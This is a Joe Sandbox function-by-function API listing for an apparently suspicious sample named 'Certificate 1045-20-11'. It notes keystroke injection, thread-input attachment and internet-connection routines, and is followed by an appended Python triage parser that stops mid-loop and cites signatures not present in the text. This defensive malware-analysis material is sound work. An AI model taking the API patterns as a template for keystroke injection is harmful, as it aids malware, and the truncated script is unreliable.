                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,0088052F,?,008806D7), ref: 00880572
                                                                                • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00880584
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                • API String ID: 2574300362-1587604923
                                                                                • Opcode ID: ebe45005020aefc646bc7ade7301c1b7541577254a70e315ee27529d48098a97
                                                                                • Instruction ID: 17dafb60d2ddd62a1c8d4a3e925f784110b7150acc9034c341ef0b111afde659
                                                                                • Instruction Fuzzy Hash: 27D052304107229EC7307F30A808A12BBF8FB04300B14842AE9A1E2A54EAB4C8848F20
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,0089ECBE,?,0089EBBB), ref: 0089ECD6
                                                                                • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0089ECE8
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                • API String ID: 2574300362-1816364905
                                                                                • Opcode ID: 7860015020fbb3258af37d55244bf6e81c772187abd6d8ccaeadd4464259a280
                                                                                • Instruction ID: 7c7d58e4aa7c50c27d3d54b9b5be44139520c4cdce249adb9d65c6325ef485f0
                                                                                • Instruction Fuzzy Hash: 1AD0A7308107239FCF20BF70EC48A12BAF4FB00304B18882BF895E2251DB74C8808610
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000000,0089BAD3,00000001,0089B6EE,?,008DDC00), ref: 0089BAEB
                                                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 0089BAFD
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                                                • API String ID: 2574300362-199464113
                                                                                • Opcode ID: 78343cd27eeac8f45446a044be2d5daee20100b1dcf96a660ef14628a9384651
                                                                                • Instruction ID: 6a9cb2c3cbadd0c82af932cc21343c1260c12cb3e5b8c61e81956eecb22bffba
                                                                                • Instruction Fuzzy Hash: 13D05E308007129FCB306F30B848A22B6E4FB00310B18842AA953E2294DB74C884CA10
                                                                                APIs
                                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,008A3BD1,?,008A3E06), ref: 008A3BE9
                                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 008A3BFB
                                                                                Similarity
                                                                                • API ID: AddressLibraryLoadProc
                                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                • API String ID: 2574300362-4033151799
                                                                                • Opcode ID: f26d55fe3d7fe3d59d82ad93de7ce8366e264e588631deeaebf60e324f7207b7
                                                                                • Instruction ID: 57a4d53d05cefe2a2087189be327a5dea1e74f4694ce2b234006f6edca320a0c
                                                                                • Instruction Fuzzy Hash: 3FD0A7704007169FE7206F70EC09A13FAF4FB13324B14842BF455E2650D6BCC4808E10
                                                                                APIs
                                                                                • CoInitialize.OLE32(00000000), ref: 0089AAB4
                                                                                • CoUninitialize.OLE32 ref: 0089AABF
                                                                                  • Part of subcall function 00880213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0088027B
                                                                                • VariantInit.OLEAUT32(?), ref: 0089AACA
                                                                                • VariantClear.OLEAUT32(?), ref: 0089AD9D
                                                                                Similarity
                                                                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                • String ID:
                                                                                • API String ID: 780911581-0
                                                                                • Opcode ID: 060df6429ca9fb2359e0bc16d08be9d8e1d7a1dda4e2aae10adebf2bffa3fc0a
                                                                                • Instruction ID: 8750bd07485dba91c4e408afc87db8c057a27dae9c568b1bf9553a3b151fcd82
                                                                                • Instruction Fuzzy Hash: 41A126352047059FCB14EF18C495A1AB7E4FF89724F188859FA96DB3A2CB30ED44CB86
                                                                                Similarity
                                                                                • API ID: Variant$AllocClearCopyInitString
                                                                                • String ID:
                                                                                • API String ID: 2808897238-0
                                                                                • Opcode ID: ac8da52bac6272f50c29275df535c848e219fd5a859d65112b736c210d296898
                                                                                • Instruction ID: f4c5cdb5401c49ce59773189818df0d2df7d0f175c89228008be2c1ee31a16f8
                                                                                • Instruction Fuzzy Hash: 6A518230600706DBDB24AF699895A2EB3A5FF45314B20D81FE59ECB3D6DB75D8808706
                                                                                Similarity
                                                                                • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                • String ID:
                                                                                • API String ID: 3877424927-0
                                                                                • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                • Instruction ID: f6260eecc734d2e5d3a6da2448a0cbe49207cd44c22f5ce0c968f534f6568117
                                                                                • Instruction Fuzzy Hash: 5E51A3B4A0030AABDB248F69C8846AE77A5FF50324F268739F825D72D0DB719F509B51
                                                                                APIs
                                                                                • GetWindowRect.USER32(00C86880,?), ref: 008AC544
                                                                                • ScreenToClient.USER32(?,00000002), ref: 008AC574
                                                                                • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 008AC5DA
                                                                                Similarity
                                                                                • API ID: Window$ClientMoveRectScreen
                                                                                • String ID:
                                                                                • API String ID: 3880355969-0
                                                                                • Opcode ID: 08ae0b6952f362f1c742963af97166a72fe5ca0ddfd2199a9e01692abc503e02
                                                                                • Instruction ID: 1a16cb6b950d69c00bc9ea0bc7e80118224ba7e0a7d7daf0333ecada4ee74c39
                                                                                • Instruction Fuzzy Hash: E8514C75A00208EFDF20DF68C880AAE7BB5FB56324F108659F965DB690D730ED41DB90
                                                                                APIs
                                                                                • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0087C462
                                                                                • __itow.LIBCMT ref: 0087C49C
                                                                                  • Part of subcall function 0087C6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0087C753
                                                                                • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0087C505
                                                                                • __itow.LIBCMT ref: 0087C55A
                                                                                Similarity
                                                                                • API ID: MessageSend$__itow
                                                                                • String ID:
                                                                                • API String ID: 3379773720-0
                                                                                • Opcode ID: e3b784d6df4dfa530dc6d9bb029f96f31ec372d5d7748a170b2fe0ac320920ad
                                                                                • Instruction ID: 448f38ee6755ed807f29e4fb9f73476104e5aeec4b65715917a8c5b72e84c17d
                                                                                • Instruction Fuzzy Hash: 3F419371A0020CABDF11EF58C855BEE7BB9FF49704F004019FA09E7292DB71DA458BA2
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00883966
                                                                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 00883982
                                                                                • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 008839EF
                                                                                • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00883A4D
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                • String ID:
                                                                                • API String ID: 432972143-0
                                                                                • Opcode ID: ef712f081e90a79a34ffc29fd5bc6238ecf1ed138938af20a1e008b37bf5751d
                                                                                • Instruction ID: 71d5a8a7953adf90e52ee58fac1ff88e5bd97d5fb9fc3641bf7c5a7a0e2360ff
                                                                                • Opcode Fuzzy Hash: ef712f081e90a79a34ffc29fd5bc6238ecf1ed138938af20a1e008b37bf5751d
                                                                                • Instruction Fuzzy Hash: 95410470A04218AAEF20AB68CC05BFDBFB9FB56710F04011AE4C1D22C2C7B48E85D765
                                                                                APIs
                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0088E742
                                                                                • GetLastError.KERNEL32(?,00000000), ref: 0088E768
                                                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0088E78D
                                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0088E7B9
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                • String ID:
                                                                                • API String ID: 3321077145-0
                                                                                • Opcode ID: 6c0d57377672d0d16293daf113e257b7e8314def22023026c60284c87184e243
                                                                                • Instruction ID: f1fd3d97e59954c4cd70c313db5798fd33d657ee3e4ba0d24d71bb039523eee7
                                                                                • Opcode Fuzzy Hash: 6c0d57377672d0d16293daf113e257b7e8314def22023026c60284c87184e243
                                                                                • Instruction Fuzzy Hash: BA411639600614DFCF21EF19C44494DBBE5FF9A710B198498E986AB3A2CB74FD00CB92
                                                                                APIs
                                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 008AB5D1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: InvalidateRect
                                                                                • String ID:
                                                                                • API String ID: 634782764-0
                                                                                • Opcode ID: f07f6547c1f382ad29d768c582e7c3de016f64e6e053c677b9f55113a40e58db
                                                                                • Instruction ID: cf15cc77c321425d1d8d995ebde58c08d1845eec4ad3eaa687b2144440b6a258
                                                                                • Opcode Fuzzy Hash: f07f6547c1f382ad29d768c582e7c3de016f64e6e053c677b9f55113a40e58db
                                                                                • Instruction Fuzzy Hash: 6E31BE74A01208AFFB249F58CC85FA87BA5FB17314F544211FA51D7AE3C770A9509B52
                                                                                APIs
                                                                                • ClientToScreen.USER32(?,?), ref: 008AD807
                                                                                • GetWindowRect.USER32(?,?), ref: 008AD87D
                                                                                • PtInRect.USER32(?,?,008AED5A), ref: 008AD88D
                                                                                • MessageBeep.USER32(00000000), ref: 008AD8FE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                                • String ID:
                                                                                • API String ID: 1352109105-0
                                                                                • Opcode ID: 7ee2491aa9489c0fe6d89792dc3f20b18b24b3596bf844affef704036ce1f3ea
                                                                                • Instruction ID: a36bbc68d47a06fbf4ffb489541bb24fe4e6ed3eb2ff3c4dc233a08aa4f4802a
                                                                                • Opcode Fuzzy Hash: 7ee2491aa9489c0fe6d89792dc3f20b18b24b3596bf844affef704036ce1f3ea
                                                                                • Instruction Fuzzy Hash: D5419A70A00319DFEB11DF58C884BA97BF5FB4A315F1885B9E916CBA60D338E941CB40
                                                                                APIs
                                                                                • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00883AB8
                                                                                • SetKeyboardState.USER32(00000080,?,00008000), ref: 00883AD4
                                                                                • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00883B34
                                                                                • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00883B92
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: KeyboardState$InputMessagePostSend
                                                                                • String ID:
                                                                                • API String ID: 432972143-0
                                                                                • Opcode ID: 0e0d869aaa6d4f2259e4c285957aff6fd4a3528fbe0bcb682c54376bbcdbe96b
                                                                                • Instruction ID: 655ec0a5ecdd311b1254c8759ef3aa7e6c20cc06578da464ba98911ee3d181cc
                                                                                • Opcode Fuzzy Hash: 0e0d869aaa6d4f2259e4c285957aff6fd4a3528fbe0bcb682c54376bbcdbe96b
                                                                                • Instruction Fuzzy Hash: 183104B0A00258AEEF20BB68C819BFE7BB6FB55720F04015AE481E32D1C7748F45C766
                                                                                APIs
                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00874038
                                                                                • __isleadbyte_l.LIBCMT ref: 00874066
                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00874094
                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 008740CA
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                • String ID:
                                                                                • API String ID: 3058430110-0
                                                                                • Opcode ID: 9a547b01c2de42d66cf3334011b85387008954adbbe8aa77ca70564b27f2233a
                                                                                • Instruction ID: 879ee8dcf4b44e6ef8da457ac3d9bd746f0a9c52bcb6b868eb88f1731a1eed5b
                                                                                • Opcode Fuzzy Hash: 9a547b01c2de42d66cf3334011b85387008954adbbe8aa77ca70564b27f2233a
                                                                                • Instruction Fuzzy Hash: D431D031600A16AFDB61DF34C844BBA7BB5FF40310F199029E669CB1A4E731D890DB90
                                                                                APIs
                                                                                • GetForegroundWindow.USER32 ref: 008A7CB9
                                                                                  • Part of subcall function 00885F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 00885F6F
                                                                                  • Part of subcall function 00885F55: GetCurrentThreadId.KERNEL32 ref: 00885F76
                                                                                  • Part of subcall function 00885F55: AttachThreadInput.USER32(00000000,?,0088781F), ref: 00885F7D
                                                                                • GetCaretPos.USER32(?), ref: 008A7CCA
                                                                                • ClientToScreen.USER32(00000000,?), ref: 008A7D03
                                                                                • GetForegroundWindow.USER32 ref: 008A7D09
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                • String ID:
                                                                                • API String ID: 2759813231-0
                                                                                • Opcode ID: 9d21516722d467ff1bad7613838ab2b4df220263b478acc36a5e5a3aefcb306e
                                                                                • Instruction ID: 708670cf08b1cfb746a2ed7bb0cb6fa8571eedd773a838713e59c843440306c9
                                                                                • Opcode Fuzzy Hash: 9d21516722d467ff1bad7613838ab2b4df220263b478acc36a5e5a3aefcb306e
                                                                                • Instruction Fuzzy Hash: 70311E71900108AFDB00EFA9CC459EFBBF9FF55314B108466E915E3211DA319E058BA1
                                                                                APIs
                                                                                  • Part of subcall function 0085B34E: GetWindowLongW.USER32(?,000000EB), ref: 0085B35F
                                                                                • GetCursorPos.USER32(?), ref: 008AF211
                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,008BE4C0,?,?,?,?,?), ref: 008AF226
                                                                                • GetCursorPos.USER32(?), ref: 008AF270
                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,008BE4C0,?,?,?), ref: 008AF2A6
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                • String ID:
                                                                                • API String ID: 2864067406-0
                                                                                • Opcode ID: 5faf36e95ae1ecc59539883011a708671ecc39a0a9c505237644a53094d26876
                                                                                • Instruction ID: bbe08f1410a29765ebc7742fe79f74f84b8be67c576d95c01652c15c969a3ed7
                                                                                • Opcode Fuzzy Hash: 5faf36e95ae1ecc59539883011a708671ecc39a0a9c505237644a53094d26876
                                                                                • Instruction Fuzzy Hash: 30219139500518AFDB259F94CC98EFE7BB9FF4A710F048069FA09876A2D3319D51DB50
                                                                                APIs
                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00894358
                                                                                  • Part of subcall function 008943E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00894401
                                                                                  • Part of subcall function 008943E2: InternetCloseHandle.WININET(00000000), ref: 0089449E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$CloseConnectHandleOpen
                                                                                • String ID:
                                                                                • API String ID: 1463438336-0
                                                                                • Opcode ID: bef6240f3310d04461437205a91b0d2374e2d1b77bc11d46fe5c96af9d7c7f6e
                                                                                • Instruction ID: abd91e2bc281ce06313c532f43c1e9b0dabb3f9d78a7330d04dd445db3ae3d0a
                                                                                • Opcode Fuzzy Hash: bef6240f3310d04461437205a91b0d2374e2d1b77bc11d46fe5c96af9d7c7f6e
                                                                                • Instruction Fuzzy Hash: 3521A131200B05BFEF16AF749C00FBBB7B9FF44715F18501ABA15D6A50DB719822A791
                                                                                APIs
                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 008A8AA6
                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 008A8AC0
                                                                                • SetWindowLongW.USER32(?,000000EC,00000000), ref: 008A8ACE
                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 008A8ADC
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Long$AttributesLayered
                                                                                • String ID:
                                                                                • API String ID: 2169480361-0
                                                                                • Opcode ID: 19de5b7a7dd1d63f8abf12a10e9674895e168379db97875ffa7f1adffd9cb212
                                                                                • Instruction ID: e949a4e9841a3d069a42c13bc3b6313049e2d642838fa04bc5ed34d18eac788a
                                                                                • Opcode Fuzzy Hash: 19de5b7a7dd1d63f8abf12a10e9674895e168379db97875ffa7f1adffd9cb212
                                                                                • Instruction Fuzzy Hash: 6E118E31245625AFEB04AB18CC05FBA77A9FF86321F144519F916C72E2DBB0BD0087A6
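The function records in this listing are far easier to triage as a table of address, API set and tag than as the flat text the report page exports. The parser below is an added example and is not part of the Joe Sandbox report; it reads records in exactly the layout shown here (an "APIs" block of "• Name.MODULE(args), ref: ADDR" lines, a "Memory Dump Source" block, a "Similarity" block of "• key: value" lines), strips the "Download File" link residue that the page export fuses onto the dump-source lines, decodes the PostMessageW message constants, and tags API combinations worth a second look. The tag table and the WM_ constant names are my own choice; the two sample records are excerpted from this listing. One caveat when reading the tags: the signatures above say this binary is probably a compiled AutoIt script, and an AutoIt runtime carries functions such as the keyboard-state/SendInput routine and the select/accept routine whether or not the embedded script ever calls them, so a tag says where to look in the binary, not what the sample does.

```python
"""Parse Joe Sandbox function records (IDA plugin listing) and tag API sets.

Added example; not part of the Joe Sandbox report or product.  It assumes the
plain-text layout of the listing above.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Sample input: two records excerpted from the listing above (the keyboard
# state routine at 00883966.. and the hard-link routine at 0088E742..),
# reduced to the fields the parser reads.  One dump-source line keeps the
# "Download File" residue on purpose so the cleanup is exercised.
SAMPLE = """\
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00883966
• SetKeyboardState.USER32(00000080,?,00000001), ref: 00883982
• PostMessageW.USER32(00000000,00000102,?,00000001), ref: 008839EF
• SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00883A4D
Memory Dump Source
• Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
• Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: ef712f081e90a79a34ffc29fd5bc6238ecf1ed138938af20a1e008b37bf5751d
APIs
• CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0088E742
• GetLastError.KERNEL32(?,00000000), ref: 0088E768
• DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0088E78D
• CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0088E7B9
Similarity
• API ID: CreateHardLink$DeleteErrorFileLast
• API String ID: 3321077145-0
• Opcode ID: 6c0d57377672d0d16293daf113e257b7e8314def22023026c60284c87184e243
"""

SECTIONS = ("APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")

# "Part of subcall function XXXX: " prefix is optional; the argument list is
# optional too (e.g. "GetForegroundWindow.USER32 ref: 008A7CB9").
API_LINE = re.compile(
    r"^(?:Part of subcall function ([0-9A-Fa-f]+):\s*)?"
    r"([\w:]+)\.(\w+)(?:\(([^)]*)\))?,?\s*ref:\s*([0-9A-Fa-f]+)$"
)

# Window messages seen as the second PostMessageW argument in this listing.
WM_NAMES = {"00000100": "WM_KEYDOWN", "00000101": "WM_KEYUP", "00000102": "WM_CHAR"}

# Triage tags (my own heuristic choices): tag applies when every listed API
# appears in the record, directly or via a "Part of subcall" line.
TAGS = [
    ("synthetic keystrokes", {"GetKeyboardState", "SetKeyboardState", "SendInput"}),
    ("WinINet request", {"InternetConnectW"}),
    ("listening socket", {"select", "accept"}),
    ("hard link", {"CreateHardLinkW"}),
    ("thread input attach", {"AttachThreadInput"}),
    ("layered window", {"SetLayeredWindowAttributes"}),
]


@dataclass
class ApiCall:
    name: str
    module: str
    args: str
    ref: str                       # address of the call site, as printed
    subcall_of: Optional[str] = None  # set when the line is "Part of subcall function"


@dataclass
class FunctionRecord:
    calls: List[ApiCall] = field(default_factory=list)
    fields: dict = field(default_factory=dict)  # Similarity and dump-source key/values

    def api_names(self) -> List[str]:
        return [c.name for c in self.calls]

    def label(self) -> str:
        """Address of the first direct call site; the report prints no function start."""
        direct = [c.ref for c in self.calls if c.subcall_of is None]
        return direct[0] if direct else "?"


def parse(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    rec, section = None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            if line == "APIs":              # every record begins with its APIs block
                rec = FunctionRecord()
                records.append(rec)
            section = line
            continue
        if rec is None or not line.startswith("•"):
            continue
        body = line.lstrip("•").strip()
        if section == "APIs":
            m = API_LINE.match(body)
            if m:
                rec.calls.append(ApiCall(m.group(2), m.group(3), m.group(4) or "", m.group(5), m.group(1)))
        else:
            key, _, value = body.partition(":")
            value = value.strip()
            if value.endswith("Download File"):   # link text fused onto the line by the page export
                value = value[: -len("Download File")].strip()
            rec.fields[key.strip()] = value
    return records


def tags(rec: FunctionRecord) -> List[str]:
    present = set(rec.api_names())
    return [name for name, needed in TAGS if needed <= present]


def posted_messages(rec: FunctionRecord) -> List[str]:
    """Decode the uMsg argument of every PostMessageW call in the record."""
    out = []
    for c in rec.calls:
        if c.name == "PostMessageW":
            parts = c.args.split(",")
            if len(parts) > 1:
                out.append(WM_NAMES.get(parts[1], parts[1]))
    return out


if __name__ == "__main__":
    for r in parse(SAMPLE):
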